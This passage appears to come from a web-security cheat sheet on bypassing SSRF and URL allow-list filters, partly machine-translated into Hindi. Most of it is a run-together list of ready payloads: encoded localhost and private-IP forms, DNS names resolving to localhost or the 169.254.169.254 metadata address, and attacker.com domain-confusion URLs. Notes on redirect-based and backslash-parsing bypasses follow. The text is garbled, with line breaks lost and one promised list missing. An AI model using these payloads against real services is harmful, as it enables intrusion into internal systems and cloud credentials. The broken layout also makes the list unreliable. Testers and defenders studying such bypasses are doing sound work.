# Localhosthttp://127.0.0.1:80http://127.0.0.1:443http://127.0.0.1:22http://127.1:80http://127.000000000000000.1http://0http:@0/-->http://localhost/http://0.0.0.0:80http://localhost:80http://[::]:80/http://[::]:25/SMTPhttp://[::]:3128/Squidhttp://[0000::1]:80/http://[0:0:0:0:0:ffff:127.0.0.1]/thefilehttp://①②⑦.⓪.⓪.⓪# CDIR bypasshttp://127.127.127.127http://127.0.1.3http://127.0.0.0# Dot bypass127。0。0。1127%E3%80%820%E3%80%820%E3%80%821# Decimal bypasshttp://2130706433/=http://127.0.0.1http://3232235521/=http://192.168.0.1http://3232235777/=http://192.168.1.1# Octal Bypasshttp://0177.0000.0000.0001http://00000177.00000000.00000000.00000001http://017700000001# Hexadecimal bypass127.0.0.1=0x7f000001http://0x7f000001/=http://127.0.0.1http://0xc0a80014/=http://192.168.0.200x7f.0x00.0x00.0x010x0000007f.0x00000000.0x00000000.0x00000001# Add 0s bypass127.000000000000.1# You can also mix different encoding formats# https://www.silisoftware.com/tools/ipconverter.php# Malformed and rarelocalhost:+11211aaalocalhost:00011211aaaahttp://0/http://127.1http://127.0.1# DNS to localhostlocaltest.me=127.0.0.1customer1.app.localhost.my.company.127.0.0.1.nip.io=127.0.0.1mail.ebc.apple.com=127.0.0.6 (localhost)127.0.0.1.nip.io=127.0.0.1 (Resolves tothegivenIP)www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us=Resolvestowww.google.comhttp://customer1.app.localhost.my.company.127.0.0.1.nip.iohttp://bugbounty.dod.network=127.0.0.2 (localhost)1ynrnhl.xip.io==169.254.169.254spoofed.burpcollaborator.net=127.0.0.1
Burp एक्सटेंशनBurp-Encode-IP IP फॉर्मेटिंग बायपास को लागू करता है।
# Try also to change attacker.com for 127.0.0.1 to try to access localhost# Try replacing https by http# Try URL-encoded charactershttps://{domain}@attacker.comhttps://{domain}.attacker.comhttps://{domain}%6D@attacker.comhttps://attacker.com/{domain}https://attacker.com/?d={domain}https://attacker.com#{domain}https://attacker.com@{domain}https://attacker.com#@{domain}https://attacker.com%23@{domain}https://attacker.com%00{domain}https://attacker.com%0A{domain}https://attacker.com?{domain}https://attacker.com///{domain}https://attacker.com\{domain}/https://attacker.com;https://{domain}https://attacker.com\{domain}/https://attacker.com\.{domain}https://attacker.com/.{domain}https://attacker.com\@@{domain}https://attacker.com:\@@{domain}https://attacker.com#\@{domain}https://attacker.com\anything@{domain}/https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com# On each IP position try to put 1 attackers domain and the others the victim domainhttp://1.1.1.1&@2.2.2.2#@3.3.3.3/#Parameter pollutionnext={domain}&next=attacker.com
पथ और एक्सटेंशन बायपास
यदि आपको यह आवश्यकता है कि URL का अंत एक पथ या एक्सटेंशन में होना चाहिए, या URL में एक पथ होना चाहिए, तो आप निम्नलिखित बायपास में से कोशिश कर सकते हैं:
यह टूल recollapse एक दिए गए इनपुट से विभिन्नताएँ उत्पन्न कर सकता है ताकि उपयोग किए गए रेजेक्स को छलना किया जा सके। इस पोस्ट को भी अधिक जानकारी के लिए देखें।
रीडायरेक्ट के माध्यम से बायपास
संभावित है कि सर्वर मूल अनुरोध को फ़िल्टर कर रहा हो एक SSRF का लेकिन नहीं उस अनुरोध के लिए संभावित रीडायरेक्ट प्रतिक्रिया।
उदाहरण के लिए, एक सर्वर जो SSRF के माध्यम से वंलरबल है: url=https://www.google.com/ में url पैरामीटर को फ़िल्टर कर रहा हो। लेकिन यदि आप python सर्वर का उपयोग करते हैं जो 302 के साथ प्रतिसाद देने के लिए है जहाँ आप रीडायरेक्ट करना चाहते हैं, तो आप फ़िल्टर किए गए IP पतों जैसे 127.0.0.1 या फिल्टर किए गए प्रोटोकॉल जैसे gopher तक उपयोग कर सकते हैं।
इस रिपोर्ट की जाँच करें।
बैकस्लैश-ट्रिकWHATWG URL Standard और RFC3986 के बीच एक अंतर का शोषण करती है। जबकि RFC3986 एक URI के लिए सामान्य ढांचा है, WHATWG वेब URL के लिए विशेष है और आधुनिक ब्राउज़र्स द्वारा अपनाया गया है। मुख्य भिन्नता WHATWG मानक में बैकस्लैश (\) को आगे की तरफ स्लैश (/) के समान मानने में है, यह URL कैसे पार्स होते हैं पर प्रभाव डालता है, विशेष रूप से होस्टनाम से पथ में एक URL में संकेतित करता है।